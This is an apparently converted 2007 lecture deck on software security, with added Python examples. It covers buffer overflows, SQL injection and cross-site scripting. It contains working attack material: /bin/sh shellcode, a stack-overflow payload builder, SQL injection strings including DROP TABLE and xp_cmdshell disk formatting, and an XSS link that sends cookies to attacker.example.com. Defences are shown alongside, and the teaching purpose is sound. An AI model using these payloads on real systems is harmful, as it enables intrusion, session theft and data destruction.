April 26, 2007 Centre College: Software Security

Page 1: April 26, 2007 Centre College: Software Security

April 26, 2007 Centre College: Software Security

Software Security

Have You Ever Written a Security Bug?

Page 2

Charles Frank

• Department of Computer Science

• Northern Kentucky University

[email protected]

• http://www.nku.edu/~frank

Page 3

What We Don’t Know

“Have you ever written a program section with a security hole? How do you know?”

Mark G. Graff & Kenneth R. van Wyk

Page 4

A Growing Problem

[Chart: Software Vulnerabilities by Year, 1995 to 2006; y-axis Vulnerabilities, 0 to 9000]

Page 5

Traditional Security is Reactive

• Perimeter defense (firewalls)

• Intrusion detection

• Over-reliance on cryptography

• Penetrate & patch

• Penetration testing

Page 6

What is web application security?

It's more than just cryptography.
– SSL won't solve all your problems.

It's more than securing the web server.
– Web applications have their own problems.

It's more than application firewalls.
– A firewall can't know every safe action at every possible state in your application.

Page 7

Firewalls don’t protect web apps

[Diagram: Web Client -> Firewall (only port 80 HTTP traffic passes) -> Web Server -> Application -> Database Server. The attack travels inside the HTTP traffic the firewall is configured to allow, so the firewall never sees it as hostile.]

Page 8

Penetrate and Patch

Discover flaws after deployment, often by attackers.

Users may not deploy patches.

Patches may have security flaws (15%?).

Patches are maps to vulnerabilities: attackers reverse engineer them to create attacks.

Page 9

Penetrate-and-Patch Approach

Page 10

The Problem is Software

“We wouldn’t have to spend so much time and effort on network security if we didn’t have such bad software security”

Bruce Schneier, author of "Applied Cryptography" and "Secrets & Lies: Digital Security in a Networked World"

Page 11

Hackers

“Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.”

John Viega & Gary McGraw

Page 12

Developers Aren’t Ready

“64% of developers are not confident in their ability to write secure applications”

Bill Gates, RSA 2005

Page 13

Industry Problem

• There is no software liability – no incentive for secure software

• Most developers never learned to produce secure code

• Because of competition and cost considerations, software is produced under severe time constraints.

Page 14

Developer’s Education

• Most programming courses ignore secure software development

• Most software engineering courses ignore secure software engineering

Page 15

Complexity

• Software products are growing in size

• Windows XP has 40 million lines of code

• 5-50 bugs per KLOC

• 10% of bugs result in security faults

• 40,000 KLOC × 5 bugs/KLOC × 10% = 20,000 security bugs, and that is with the low end of the bug-density range

• Software is often written in low level languages such as C/C++

Page 16

Security Problems

SECURITY BUGS (50%)

• Buffer overflow

• Command injection

• Cross-site scripting

• Integer overflow

• Race condition

• Untrusted input

ARCHITECTURAL FLAWS (50%)

• Cryptography misuse

• Lack of compartmentalization

• More privilege than necessary

• Relying on secret algorithms

• Sharing resources

• Usability problems

Page 17

Essential Facts

Software Security ≠ Security Features
– Cryptography will not make you secure.
– Application firewalls will not provide security.

50/50 Architecture/Coding Problems

An Emergent Property of Software
– Like Usability or Reliability
– Not a Feature

Page 18

Software Security Practices

1. Code Reviews
2. Risk Analysis
3. Penetration Testing
4. Security Testing
5. Abuse Cases
6. Security Operations

[Diagram: the six practices (Abuse Cases, Risk Analysis, Code Reviews + Static Analysis, Security Testing, Penetration Testing, Security Operations) mapped onto the lifecycle phases Requirements, Design, Coding, Testing, Maintenance]

Page 19

Vulnerability Trends for 2006

Page 20

Software Vulnerabilities

1. Malicious Client
2. Buffer Overflow
3. SQL Injection
4. Cross-site Scripting
5. Format String
6. Race Condition
7. Information Leakage
8. Path Traversal
9. Command Injection
10. Integer Overflow
11. PHP Include

Page 21

Malicious Client

• Developers can mistakenly trust data from a client in server-side code

• Attackers can take advantage of this trust

• Security tester’s job is to violate the data specifications to find security vulnerabilities

Page 22

Manipulate Network Requests

• Write a client to send custom requests
– Might modify the client code to send malformed requests

• Use a proxy to receive network traffic from a client and modify it before sending it on to the server.
– Firefox Add-on "Tamper Data"
– WebScarab from OWASP

Page 23

Tamper Data

• Firefox Browser Add-on

• Google for Tamper Data

• Tools | Tamper Data

Page 24

[Screenshot: Tamper Data]

Page 25

[Screenshot: Tamper Data]

Page 26

Buffer Overflow Topics

1. What is a Buffer Overflow?

2. Buffer Overflow Examples

3. Program Stacks

4. Smashing the Stack

5. Shellcode

6. Mitigations

Page 27

Buffer Overflows

A program accepts too much input and stores it in a fixed length buffer that's too small.

    char A[8];
    short B;

Memory before gets(A), with B laid out right after A and holding the value 3:

    A A A A A A A A B B
    0 0 0 0 0 0 0 0 0 3

Memory after gets(A) reads the input "overflows" (nine characters plus the terminating NUL, so the last two bytes land in B):

    A A A A A A A A B B
    o v e r f l o w s 0

    gets(A);

Page 28

Buffer Overflow Examples

Morris Worm
– Took down most of the Internet in 1988.
– Exploited a buffer overflow in fingerd.
– Subsequent worms used overflow attacks too.

MS07-004: Internet Explorer
– Buffer overflow in VML.
– Allows remote code execution.
– Not the first overflow in IE or other browsers.

Page 29

Buffer Overflow Example #1

What's the mistake in this program?

    #include <stdio.h>

    int main() {
        int array[5] = {1, 2, 3, 4, 5};
        printf("%d\n", array[5]);   /* valid indexes are 0..4: reads one int past the end */
        return 0;
    }

Program output:

    > gcc -o buffer buffer.c
    > ./buffer
    7077876

Page 30

Buffer Overflow Example #2

Writing beyond the buffer:

    int main() {
        int array[5] = {1, 2, 3, 4, 5};
        int i;
        for (i = 0; i <= 255; ++i)   /* writes 256 ints into a 5-int buffer */
            array[i] = 41;
        return 0;
    }

Program output:

    > gcc -o bufferw bufferw.c
    > ./bufferw
    Segmentation fault (core dumped)

Page 31

What happened to our program?

The buffer overflow:
– Overwrote memory beyond the buffer with 41.
– Eventually reached a memory page that was not writable by the program.
– The OS terminated the program with a segmentation fault.

Do overflows always produce a crash?
– An uncontrolled overflow usually does.
– A careful attacker overwrites only valid, mapped memory, so the program keeps running with the attacker's changes in place.

Page 32

Why do programmers keep making the same mistake?

C/C++ are inherently unsafe.
– No bounds checking.
– Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc.

Java, Python largely immune.
C/C++ gain performance by not checking.

Page 33

Stack at Function Start

Higher addresses at the top; the stack grows downward.

    old stack frame
    parameter #N
    ...
    parameter #1
    return address
    old FP            <- Frame Pointer
    local vars
                      <- Stack Pointer

Page 34

Shellcode

Shellcode is machine code that starts a command shell. With a shell, you can run any command.

Page 35

Shellcode

Shellcode in C.

    #include <unistd.h>

    int main() {
        char *name[2];
        name[0] = "/bin/sh";
        name[1] = 0x0;                  /* argv must be NULL-terminated */
        execve(name[0], name, 0x0);     /* replaces this process with a shell */
    }

Running the program.

    > gcc -ggdb -static -o shell shellcode.c
    > ./shell
    sh-3.00$ exit

Page 36

From C to Machine Language

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    void main() {
        int *ret;
        ret = (int *)&ret + 2;      /* slot holding main's saved return address (32-bit frame layout) */
        (*ret) = (int)shellcode;    /* main "returns" into the shellcode instead of its caller */
    }

    > gcc -o testsc2 testsc2.c
    > ./testsc2
    sh-3.00$ exit

This is 32-bit Linux x86 code (system calls via int 0x80) and it relies on the stack and data segment being executable. On a current toolchain it needs -m32 -fno-stack-protector -z execstack, and the "+ 2" offset depends on the compiler's frame layout.

Page 37

Writing an Exploit

1. Construct shellcode to inject.
2. Find an exploitable buffer in a program.
3. Estimate the address of the buffer.
4. Run the program with an input that:
   1. Injects the shellcode into stack memory.
   2. Overwrites the return address with the address of your shellcode.
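The four steps describe the input without showing its shape. The following is an added example, not code from the slides, that lays out such an input in Python for a hypothetical 32-bit Linux x86 target, using the shellcode string from the "From C to Machine Language" slide. The buffer size (128 bytes), the saved frame pointer size (4 bytes) and the return address (0xbffffa80) are assumed values for illustration; the NOP sled in front of the shellcode is why step 3 only needs an estimate, since any address inside the sled slides into the shellcode. The function only builds bytes; nothing here runs a target program.

```python
# Added example for the "Writing an Exploit" steps; not code from the slides.
# Assembles the step-4 input for a hypothetical 32-bit Linux x86 target.
import struct

# Shellcode copied from the "From C to Machine Language" slide
# (32-bit Linux x86, execve("/bin/sh")).
SHELLCODE = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)

NOP = b"\x90"  # x86 no-op; a run of these tolerates an imprecise address estimate


def has_bad_bytes(code, bad=(b"\x00", b"\x0a")):
    """strcpy() stops copying at NUL and gets() stops at newline, so injected
    code must not contain either. Returns the offending byte values."""
    return [b for b in bad if b in code]


def return_address_offset(buffer_size, saved_fp_size):
    """Distance from the start of the buffer to the saved return address,
    per the 'Stack at Function Start' slide: the buffer, then the old FP."""
    return buffer_size + saved_fp_size


def build_payload(buffer_size, saved_fp_size, ret_addr, shellcode=SHELLCODE, nop_sled=16):
    """Assemble: [NOP sled][shellcode][filler][old FP filler][ret_addr x 4].

    buffer_size, saved_fp_size and ret_addr are assumptions about the target
    (hypothetical values); ret_addr should land inside the NOP sled.
    """
    if has_bad_bytes(shellcode):
        raise ValueError("shellcode contains bytes that stop a C string copy")
    body = NOP * nop_sled + shellcode
    if len(body) > buffer_size:
        raise ValueError("buffer too small for NOP sled + shellcode")
    # Pad out the rest of the buffer and clobber the saved frame pointer.
    filler = b"A" * (return_address_offset(buffer_size, saved_fp_size) - len(body))
    ret = struct.pack("<I", ret_addr)  # little-endian 32-bit address
    # Repeat the address so a slightly wrong offset estimate still hits the slot.
    return body + filler + ret * 4


if __name__ == "__main__":
    payload = build_payload(buffer_size=128, saved_fp_size=4, ret_addr=0xBFFFFA80)
    print(len(payload), "bytes; return address at offset",
          return_address_offset(128, 4))
```

The bad-byte check is the part people forget: the slide's shellcode was written to avoid NUL bytes precisely because it is delivered through a C string copy, and the same rule applies to the packed return address.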

Page 38

Compiler Defenses: Canaries

Goal: Detect altered return addresses.

Method: Compiler changes stack layout.Adds canary to stack when function called.

Must overwrite canary to change return addr.

Checks canary before function returns.

Terminate program if canary modified.

Canaries are random to prevent guessing.

Visual Studio 2005 (/GS) and gcc 4.1 (-fstack-protector) use canaries.

Page 39

Canary Stack Layout

old frame

param2

param1

return address

saved EBP

canary value

local vars

Page 40

Buffer Overflow: Key Points

Buffer overflow attacks.
– C/C++ perform no bounds checking.
– There is no difference between code and data.
– Smashing the stack.

Mitigating buffer overflows.
– Use a language with bounds checking.
– Check your own bounds in C/C++.
– Use safe functions, string libraries.

Page 41

SQL Injection

1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds string with exploit data.
4. Application sends SQL query to DB.
5. DB executes query, including exploit, sends data back to application.
6. Application returns data to user.

[Diagram: Attacker -> Firewall -> Web Server -> DB Server, with the login form fields User and Pass; Pass = ' or 1=1--]

Page 42

SQL Injection in PHP

$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD)
    or die ("Couldn't connect: " . mysql_error());

mysql_select_db($DB_DATABASE);

// $username and $password come straight from the request and are pasted
// into the SQL text, so a quote in either one rewrites the query.
$query = "select count(*) from users where username = '$username' and password = '$password'";

$result = mysql_query($query);

Page 43

SQL Metacharacters

    '                        quotes parameters
    ;                        separates commands
    --                       comments
    %, _                     globs in a LIKE clause
    %, _, *, +, |, [], ()    regular expressions in a SIMILAR TO clause

Page 44

SQL Injection Attack #1

Unauthorized Access Attempt:

    password = ' or 1=1 --

SQL statement becomes:

    select count(*) from users where username = 'user' and password = '' or 1=1 --

AND binds tighter than OR, so this checks (username is 'user' and password is empty) OR 1=1, which is always true; the count is non-zero and access is granted.

Page 45

SQL Injection Attack #2

Database Modification Attack:

    password = foo'; delete from users where username like '%

Database executes two SQL statements:

    select count(*) from users where username = 'user' and password = 'foo'
    delete from users where username like '%'

Stacked statements like this need a driver call that accepts more than one statement at a time. PHP's mysql_query() does not, but drivers for MS SQL Server and PostgreSQL (pg_query) do, and there the same input deletes every user.

Page 46

Impact of SQL Injection

    SELECT SSN FROM USERS WHERE UID='$UID'

    INPUT                                        RESULT
    5                                            Returns info for user with UID 5.
    ' OR 1=1--                                   Returns info for all users.
    ' UNION SELECT Field FROM Table WHERE 1=1--  Returns all rows from another table
                                                 (column count and types must match the first SELECT).
    ';DROP TABLE USERS--                         Deletes the users table.
    ';master.dbo.xp_cmdshell 'cmd.exe format c: /q /yes' --
                                                 Formats the C: drive of the database server if you're
                                                 running MS SQL Server and extended procedures aren't disabled.

Page 47

Solution: Prepared Queries

require_once 'MDB2.php';

$mdb2 =& MDB2::factory($dsn, $options);

if (PEAR::isError($mdb2)) {

die($mdb2->getMessage());

}

$sql = "SELECT count(*) from users where username = ? and password = ?";

$types = array('text', 'text');

// This statement returns rows, so prepare it with MDB2_PREPARE_RESULT
// (MDB2_PREPARE_MANIP is for INSERT/UPDATE/DELETE statements).
$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_RESULT);

$data = array($username, $password);

// The values are bound as data; the SQL text above is never rewritten by them.
$result = $sth->execute($data);

$count = $result->fetchOne();
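The following is an added example, not code from the slides or from PEAR MDB2: the login query from the "SQL Injection in PHP" slide rebuilt in Python against an in-memory SQLite database (a constructed two-user table), once by string interpolation and once as a prepared statement, with both slide attacks run against each. One backend difference matters for Attack #2: SQLite's execute() refuses a second stacked statement, so the DELETE is rejected here rather than run, whereas a driver that accepts multiple statements per call would execute it.

```python
# Added example, not from the slides or PEAR MDB2: the slide's login query in
# Python on an in-memory SQLite database. The two users are constructed data.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Same shape as the slide's PHP: request values are pasted into the SQL
    text, so a quote or comment marker in them rewrites the query."""
    query = ("select count(*) from users where username = '%s' and password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0]


def login_prepared(conn, username, password):
    """Prepared statement: the SQL text is fixed and the two values are bound
    as data, so they can never become part of the query's structure."""
    query = "select count(*) from users where username = ? and password = ?"
    return conn.execute(query, (username, password)).fetchone()[0]


def stacked_query_rejected(conn, username, password):
    """Attack #2 on the slides appends a second statement after ';'.
    sqlite3's execute() runs exactly one statement and raises on a second,
    so here the DELETE is rejected rather than executed; a driver that accepts
    several statements per call would run it. Returns True when rejected."""
    query = ("select count(*) from users where username = '%s' and password = '%s'"
             % (username, password))
    try:
        conn.execute(query)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1--"
    print("vulnerable:", login_vulnerable(db, "alice", bypass))  # 2: every user counted
    print("prepared:  ", login_prepared(db, "alice", bypass))    # 0: no such password
```

The vulnerable path returns a non-zero count for the `' or 1=1--` password because the injected OR makes the WHERE clause true for every row; the prepared path looks for a user whose password literally is that string and finds none.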

Page 48

Cross Site Scripting Attacks (XSS)

• Run JavaScript in the victim's browser
– <script>alert('XSS');</script>

• Get the user's cookie for the Web site to display, perhaps revealing the session ID
– <script>alert(document.cookie);</script>

• Steal the cookie and hijack the user's session
– Craft a request to the attacker's machine with the cookie as part of the file name, e.g. as an image source.

Page 49

Reflected XSS Attacks

Server-side code takes script in the user's input and echoes it back in the response, where it runs in the user's browser.

Page 50

Example

    http://server/search.aspx?keyword=<SCRIPT>alert("Running!")</SCRIPT>

The server echoes the keyword into the page unencoded, so the response contains the script:

    <BODY><H1>Search Results</H1>for =<SCRIPT>alert("Running!")</SCRIPT><h2>Sorry, no results were found for.</h2>

Page 51

Exploiting an XSS Bug

• Attacker must trick the user into running the URL with the query string.

• Send a user an email with a link to the Web site:

    http://server/search.aspx?keyword=<SCRIPT>document.location="http://attacker.example.com/default.aspx?"%2Bescape(document.cookie);</SCRIPT>

(%2B is the URL-encoded +, so once the server decodes the query string the reflected script concatenates the attacker's URL with the escaped cookie and navigates to it.)

Page 52

Anatomy of an XSS Attack

1. User logs in to the Web Server.
2. Web Server returns a session cookie.
3. Attacker sends the user an XSS link.
4. User clicks on the XSS link.
5. Browser sends the XSS URL to the Web Server.
6. Web Server returns the page with the injected code.
7. Browser runs the injected code; the evil site saves the cookie.
8. Attacker uses the stolen cookie to hijack the user's session.

[Diagram: Attacker, User and Web Server exchanging the messages above]

Page 53

Exploiting POST

    <body>
    <%
    dim strName: strName = Request.Form("myName")
    if strName = "" then
    %>
      <form method="POST" name="myForm">
        Name: <input type="text" name="myName">
        <input type="submit" value="Submit">
      </form>
    </body></html>
    <%
      Response.End
    Else
      ' strName is written back without HTML encoding: reflected XSS through a POST field
      Response.Write "Hello, " & strName & ". Nice to meet you."
    End If
    %>
    </body>

Page 54

What should we enter for Name?

    <SCRIPT>alert('XSS!')</SCRIPT>

Page 55

Getting the Victim to Submit Malicious POST

Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user’s name on the attacker’s Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability.

Page 56

Testing

• Save the Web page to your site.

• <form method="POST" name="myForm" action="http://VulnerableWebSite/helloPostDemo.asp">

• <input type="text" name="myName" value="&lt;SCRIPT&gt;alert('Hi!')&lt;/SCRIPT&gt;">

Page 57

Automatically Submitting

    <body>

    ....

    <SCRIPT>document.myForm.submit();</SCRIPT>

Page 58

Persistent XSS Attack

• Put <script>alert('Hi!')</script> into a guestbook entry.

• View the guestbook entries page again.

Page 59

Stopping XSS Attacks

• HTML-encode the attacker's input before returning it to the browser.

• Problem: Blogs may want users to use HTML. Block the script tag? (Not sufficient on its own: see the event handlers on the next slide.)

    Original character    HTML encoded
    <                     &lt;
    >                     &gt;
    &                     &amp;
    "                     &quot;
    '                     &#39;   (not in the original table; needed when input lands inside a single-quoted attribute)

Page 60

Events

• Most tags have events

• Here the application placed user data inside a single-quoted value attribute. The attacker submits OurData' onclick=alert('Hi') junk=' and the rendered tag becomes:

    <INPUT name="txtInput2" type="text" value='OurData' onclick=alert('Hi') junk=''>

• When the user clicks on the text box the onclick event will fire, with no <script> tag anywhere in the input.
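An added example, not code from the slides: the encoding table from "Stopping XSS Attacks" as a Python function, applied to the reflected search page from the "Example" slide and to the single-quoted value attribute from the "Events" slide above. The page templates and the two payloads are constructed for the demonstration. The check parses the rendered HTML with the standard library's HTMLParser, so an encoded payload that merely contains the text "onclick=" inside an attribute value is not mistaken for a real event handler.

```python
# Added example, not from the slides: the HTML-encoding table as a function,
# applied to the reflected search page ("Example" slide) and the single-quoted
# value attribute ("Events" slide). Templates and payloads are constructed here.
from html.parser import HTMLParser

# The four entries from the "Stopping XSS Attacks" slide.
SLIDE_TABLE = {"<": "&lt;", ">": "&gt;", "&": "&amp;", '"': "&quot;"}

# The slide's table plus the single quote, which the "Events" slide shows is
# all an attacker needs to leave a single-quoted attribute value.
FULL_TABLE = dict(SLIDE_TABLE, **{"'": "&#39;"})


def html_encode(text, table=FULL_TABLE):
    """Replace every structurally significant character with its entity."""
    return "".join(table.get(ch, ch) for ch in text)


def render_search_results_raw(keyword):
    """The vulnerable page: the keyword is echoed as-is (reflected XSS)."""
    return ("<BODY><H1>Search Results</H1>for %s"
            "<h2>Sorry, no results were found.</h2></BODY>" % keyword)


def render_search_results(keyword, table=FULL_TABLE):
    """The fixed page: the keyword is encoded before it reaches the browser."""
    return render_search_results_raw(html_encode(keyword, table))


def render_text_input(value, table=FULL_TABLE):
    """The INPUT tag from the 'Events' slide, value attribute single-quoted."""
    return "<INPUT name='txtInput2' type='text' value='%s'>" % html_encode(value, table)


class _TagCollector(HTMLParser):
    """Records the start-tag names and attribute names a browser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attr_names = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_names.extend(name for name, _ in attrs)


def _parse(html):
    parser = _TagCollector()
    parser.feed(html)
    parser.close()
    return parser


def tag_names(html):
    """Lower-cased start tags in document order."""
    return _parse(html).tags


def has_event_handler(html):
    """True if any tag carries an on*= attribute (onclick, onload, ...)."""
    return any(name.startswith("on") for name in _parse(html).attr_names)


if __name__ == "__main__":
    attr_payload = "OurData' onclick=alert('Hi') junk='"
    print(render_text_input(attr_payload, SLIDE_TABLE))  # table from the slide: handler survives
    print(render_text_input(attr_payload))               # with ' encoded: one harmless attribute
```

Run against the attribute payload, the slide's four-entry table leaves the single quote alone and the browser sees an onclick attribute; adding the single quote to the table keeps the whole payload inside the value. Encoding & as well is what stops an attacker from smuggling entities through the encoder.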

Page 61

Microsoft ASP.NET

• When ValidateRequest property is enabled, the query string and POST data are inspected.

• Suspicious data, such as <script> and onload=, cause an exception to be thrown.

Page 62

Identifying XSS Vulnerabilities

1. Identify where user data is supplied.

2. Send valid-looking data to the application.

3. Verify whether any of the data is returned to the Web browser.

4. Find ways to force the victim to send data and have it run as a script on the client machine.

Page 63

Knowledge

SPI Dynamics White papers
– http://www.spidynamics.com/spilabs/education/whitepapers.html
– Blind SQL Injection
– Cross Site Scripting

Page 64

OWASP Web Goat

Teaches Web application security through a series of lessons.

http://www.owasp.org/index.php/OWASP_WebGoat_Project

Lesson Planshttp://www.owasp.org/index.php/Lesson_Plans

Page 65

Going Further


Recommended